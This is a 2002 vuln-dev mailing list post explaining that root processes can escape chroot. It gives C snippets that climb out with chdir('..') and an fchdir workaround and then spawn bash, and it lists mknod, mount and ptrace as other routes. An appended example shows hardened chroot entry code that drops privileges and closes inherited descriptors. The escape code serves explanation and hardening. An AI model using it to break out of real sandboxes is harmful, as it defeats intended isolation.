Vulnerability Development mailing list archives

Re: OT? Are chroots immune to buffer overflows?


From: "Nelson Sampaio Araujo Junior" <nelson () lunenetworks com br>
Date: Fri, 24 May 2002 10:04:15 -0300

Hi,

But if you are able to run code as root, a few syscalls are still available to you:
inserting modules and ptrace().

If you're able to run code as root, all you need, in most Un*x systems,
is:

#include <unistd.h>
#include <sys/stat.h>

mkdir("blah", 0700);                 /* mkdir(2) takes a mode argument */
chroot("blah");                      /* the cwd is now outside the new root */
chdir("../../../../../../");         /* ".." is not clamped, so this walks up to the real root */
chroot(".");
execl("/bin/bash", "bash", (char *)NULL);

On other Un*x systems, like some BSDs, an implicit chdir(".") is always
made after a chroot, so this doesn't work, but you can still do mknod(2),
mount(2), etc.

To start working and prevent this "bug" :) in FreeBSD you can do the following:

#include <fcntl.h>
#include <unistd.h>
#include <sys/stat.h>

mkdir("blah", 0700);
int f = open(".", O_RDONLY);   /* directory descriptor: fchdir(2) needs a directory fd, not a FILE* */
chroot("blah");
fchdir(f);                     /* <== this will prevent the "bug" (undoes the implicit chdir) */
for (int i = 0; i < 10000; i++)
    chdir("..");
chroot(".");

Of course, you can enhance the above code to be more efficient just
by checking the chdir result.

Regards,
Nelson Junior
nelson () lunenetworks com br
nelson () LUNE com br
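The post shows the two preconditions that make a chroot escapable: the process is still root (so it may call chroot(2) again, mknod(2), mount(2) or load modules), or it keeps a descriptor or cwd that was opened outside the new root. The following is an added example, not code from the post or from FreeBSD, showing the sequence a daemon should run when it uses chroot(2) as containment and checks built from those two preconditions: every descriptor predating the chroot is closed, the cwd is moved inside the new root, privileges are dropped, and the function then verifies that uid 0 cannot be regained and that a second chroot(2), the first step of the escape above, is refused with EPERM. The names enter_jail, close_fds_from and root_privileges_gone, and the uid/gid 65534 used in the comments, are assumptions of this example; it targets Linux/glibc (setgroups(2) from <grp.h>) and must be started as root to succeed.

```c
/* Added example (not from the original post): a chroot entry routine that
 * removes the escape preconditions the post describes, then checks them. */
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <grp.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/resource.h>
#include <sys/types.h>

/* Close every descriptor >= lowfd so that no directory handle opened
 * outside the jail survives chroot(). Returns the number of fds closed. */
int close_fds_from(int lowfd)
{
    struct rlimit rl;
    int maxfd = 1024, closed = 0;

    if (getrlimit(RLIMIT_NOFILE, &rl) == 0 && rl.rlim_cur != RLIM_INFINITY)
        maxfd = rl.rlim_cur < 65536 ? (int)rl.rlim_cur : 65536;
    for (int fd = lowfd; fd < maxfd; fd++)
        if (close(fd) == 0)
            closed++;
    return closed;
}

/* 1 if this process holds no root identity and cannot get it back
 * (setuid(0) is refused with EPERM), 0 otherwise. */
int root_privileges_gone(void)
{
    if (getuid() == 0 || geteuid() == 0)
        return 0;
    return (setuid(0) == -1 && errno == EPERM) ? 1 : 0;
}

/* Confine the current process to dir and become uid/gid.
 * Returns 0 on success, -1 with errno set otherwise. Must start as root. */
int enter_jail(const char *dir, uid_t uid, gid_t gid)
{
    if (uid == 0 || gid == 0) {        /* a root process in a chroot is not jailed */
        errno = EINVAL;
        return -1;
    }
    if (chdir(dir) == -1 || chroot(".") == -1)
        return -1;
    if (chdir("/") == -1)              /* never leave the cwd outside the new root */
        return -1;
    close_fds_from(3);                 /* discard descriptors that predate the chroot */
    if (setgroups(0, NULL) == -1 || setgid(gid) == -1 || setuid(uid) == -1)
        return -1;
    if (!root_privileges_gone()) {
        errno = EPERM;
        return -1;
    }
    /* The escape in the post begins with another chroot(); without root it
     * must now be refused with EPERM. */
    if (chroot(".") == 0 || errno != EPERM) {
        errno = EPERM;
        return -1;
    }
    return 0;
}

int main(int argc, char **argv)
{
    /* Example invocation (assumed paths/ids): ./a.out /var/empty 65534 65534 */
    if (argc != 4) {
        fprintf(stderr, "usage: %s <dir> <uid> <gid>\n", argv[0]);
        return 2;
    }
    if (enter_jail(argv[1], (uid_t)atoi(argv[2]), (gid_t)atoi(argv[3])) == -1) {
        perror("enter_jail");
        return 1;
    }
    /* From here on the process runs unprivileged inside dir. */
    printf("jailed in %s as uid %d\n", argv[1], (int)getuid());
    return 0;
}
```

Refusing uid 0 up front is the point the post makes: with root kept, chroot(2) is a convenience, not a boundary, because the confined process can always call chroot(2) again or use mknod(2)/mount(2) on the underlying device. Closing inherited descriptors covers the fchdir(2) variant, which only works when a directory fd from the old root is still open.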
